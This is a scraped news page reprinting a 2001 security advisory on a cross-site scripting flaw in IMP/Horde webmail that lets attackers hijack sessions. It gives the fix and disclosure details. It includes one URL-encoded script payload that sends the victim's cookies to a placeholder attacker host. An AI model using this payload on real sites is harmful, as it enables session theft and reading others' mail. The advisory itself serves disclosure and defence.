Alerts This Week
Warning Icon 1 914
Alerts This Week
Warning Icon 1 914

Stay Ahead With Linux Security News

Filter%20icon Refine news
X Clear Filters
X Clear Filters
View More

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Community Poll

What got you started with Linux?

No answer selected. Please try again.
Please select either existing option or enter your own, however not both.
Please select minimum {0} answer(s).
Please select maximum {0} answer(s).
/main-polls/150-what-got-you-started-with-linux?task=poll.vote&format=json
150
radio
0
[{"id":483,"title":"Self-taught through trial and error","votes":555,"type":"x","order":1,"pct":78.72,"resources":[]},{"id":484,"title":"Formal training or courses","votes":30,"type":"x","order":2,"pct":4.26,"resources":[]},{"id":485,"title":"A job that required it","votes":34,"type":"x","order":3,"pct":4.82,"resources":[]},{"id":486,"title":"Other","votes":86,"type":"x","order":4,"pct":12.2,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350
bottom 200
Loading...

Explore Latest Linux Security news

We found -4 articles for you...
77

Imp Webmail Advisory: Session Hijacking Exploit Threatens Security

Joao Pedro reports that "It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper.". . .. Joao Pedro reports that "It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper." - After hijacking the cookies, the attacker can use the session and read the victim's mail. - Imp webmail is part of the Horde Application Framework, at https://www.horde.org/ , which allows web access to an email account, through pop3 or imap. - Imp is included in the Linux Madrake, Conectiva Distributions. It's also available in the Red Hat PowerTools. - It's used in several webmail sites, some of which with hundreds of thousand of users, and all of the ones tested were vulnerable. Some of the administrators were warned before this advisory being public. Some have already been patched. - All stable imp webmail versions, up to 2.2.6 including are vulnerable, the devel version, 2.3 and 3.0 Release Candidate 1 are not affected by this vulnerability. - The horde team was warned about this and have commited a fix, a new version should be uploaded soon. - To apply the patch use https://dev.horde.org/horde/login.php or just escape the $message variable $message = htmlspecialchars($message); if your imp installation is already heavily customized. - To exploit this vulnerability using a text message, the attacker sends an email with a url, where if the user clicks, is redirected to %3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B% 20%27%3E%27)%3B%3C%2Fscript%3E%0A which in return redirects the user's browser to the attacker's server where he hijacks the cookies that the browser used in the context of the webmail site, and the session therefore. This attack isjust one more example on how trusting user input is a Bad Thing(tm), as well as the risks inherent to cross-site script attacks. Please, pretty please, this was discovered while playing around with cookie-based session sites, after reading about the MS Wallet attack and saw how almost 2 years after the CERT advisory on these techniques, lots of applications are still vulnerable. There are probably lots of kids around exploiting similar vulnerabilities. So check your web applications for similar vulnerabilities and ask yourself how many times have you pasted directly into the html some variable passed by the url or cookie. - For more info on cross-site scripting, read CERT advisory and Marc Slemko's paper. Imp Project homepage: https://www.horde.org/apps/imp/ Marc Slemko's "Microsoft Passport to Trouble": CERT advisory on cross-site scripting https://www.sei.cmu.edu/library/2000-cert-advisories/ João Pedro Gonçalves This email address is being protected from spambots. You need JavaScript enabled to view it. Phibernet Information Network . Joao Pedro reports that 'It's possible to hijack an imp/horde session using a cross-site script atta. pedro, reports, 'it's, possible, hijack, imp/horde, session, using, cross-site, script. . LinuxSecurity.com Team

Calendar%202 Nov 12, 2001 User Avatar LinuxSecurity.com Team Server Security
News Add Esm H340

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Community Poll

What got you started with Linux?

No answer selected. Please try again.
Please select either existing option or enter your own, however not both.
Please select minimum {0} answer(s).
Please select maximum {0} answer(s).
/main-polls/150-what-got-you-started-with-linux?task=poll.vote&format=json
150
radio
0
[{"id":483,"title":"Self-taught through trial and error","votes":555,"type":"x","order":1,"pct":78.72,"resources":[]},{"id":484,"title":"Formal training or courses","votes":30,"type":"x","order":2,"pct":4.26,"resources":[]},{"id":485,"title":"A job that required it","votes":34,"type":"x","order":3,"pct":4.82,"resources":[]},{"id":486,"title":"Other","votes":86,"type":"x","order":4,"pct":12.2,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350
bottom 200
Your message here